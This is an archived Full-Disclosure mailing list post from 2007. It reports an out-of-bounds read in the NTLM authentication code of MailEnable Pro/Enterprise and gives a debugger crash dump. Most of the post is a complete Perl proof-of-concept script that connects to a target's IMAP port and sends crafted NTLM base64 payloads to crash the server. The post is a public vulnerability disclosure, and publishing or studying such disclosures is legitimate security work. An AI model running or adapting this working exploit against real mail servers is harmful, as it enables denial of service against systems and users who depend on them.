Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security FullDisclosure
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[Full-disclosure] MailEnable DoS POC

from [mu-b] Network Security [Permanent Link]
Subject: [Full-disclosure] MailEnable DoS POC
Date: Wed, 14 Feb 2007 10:14:14 +0000 
The POC attached exploits an out of bounds memory read in the NTLM 
authentication
routines of MailEnable Pro/Enterprise. The problem lies in the NTLM_UnPack_Type3
function of MENTLM.dll.

This appears to have been silently "patched" somewhere between versions 2.351 
and
2.36-7. (observe the quotes).

(c34.dc0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=8146930b ebx=003a6cc8 ecx=00000040 edx=00000000 esi=8146920b edi=0146b238
eip=0109b4b3 esp=014691e4 ebp=014691ec iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010212
MENTLM!NTLM_UnPack_Type3+0x3019:
0109b4b3 f3a5            rep movs dword ptr es:[edi],dword ptr [esi] 
es:0023:0146b238=00000000 ds:0023:8146920b=????????

---------------------------------------------------------------------------
(mu-b@digit-labs.org)

#!/usr/bin/perl
#
# maildisable-v5.pl
#
# Mail Enable Professional/Enterprise <=v2.35 (win32)
# by mu-b - Wed Nov 29 2006
#
# - Tested on: Mail Enable Professional v2.32 (win32) - with HOTFIX
#              Mail Enable Professional v2.33 (win32)
#              Mail Enable Professional v2.34 (win32)
#              Mail Enable Professional v2.35 (win32)
#
# out of bounds read == DoS
#
########

use Getopt::Std; getopts('t:', \%arg);
use Socket;
use MIME::Base64;

&print_header;

my $target;

if (defined($arg{'t'})) { $target = $arg{'t'} }
if (!(defined($target))) { &usage; }

my $imapd_port = 143;
my $send_delay = 2;

my $PAD = 'A';

if (connect_host($target, $imapd_port)) {
    print("-> * Connected\n");
    send(SOCKET, "1 AUTHENTICATE NTLM\r\n", 0);
    sleep($send_delay);

    $buf = ($PAD x 12).
           "\xfa\xff\xff\xff".
           ($PAD x 12);
    send(SOCKET, encode_base64($buf)."\r\n", 0);
    sleep($send_delay);

    $buf = ($PAD x 28).
           "\x00\x01".
           ($PAD x 2).
           "\xef\xbe\xad\xde";
    send(SOCKET, encode_base64($buf)."\r\n", 0);
    sleep($send_delay);

    print("-> * Successfully sent payload!\n");
}

sub print_header {
    print("MailEnable Pro <=v2.36 DoS POC\n");
    print("by: <mu-b\@digit-labs.org>\n\n");
}

sub usage {
  print(qq(Usage: $0 -t <hostname>

     -t <hostname>    : hostname to test
));

    exit(1);
}

sub connect_host {
    ($target, $port) = @_;
    $iaddr  = inet_aton($target)                 || die("Error: $!\n");
    $paddr  = sockaddr_in($port, $iaddr)         || die("Error: $!\n");
    $proto  = getprotobyname('tcp')              || die("Error: $!\n");

    socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
    connect(SOCKET, $paddr)                      || die("Error: $!\n");
    return(1338);
}

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [Full-disclosure] MailEnable DoS POC, mu-b <=
Previous by Date:  Re: [Full-disclosure] Torpark breaks with DEP enabled, and how to break it further so that it works, afed
Next by Date:  [Full-disclosure] MS Interactive Training .cbo Overflow, Brett Moore
Previous by Thread:  [Full-disclosure] Diagnostics Mode + Phreaking, Mark Sec
Next by Thread:  [Full-disclosure] MS Interactive Training .cbo Overflow, Brett Moore
Indexes:  [Date] [Thread] [Top] [All Lists]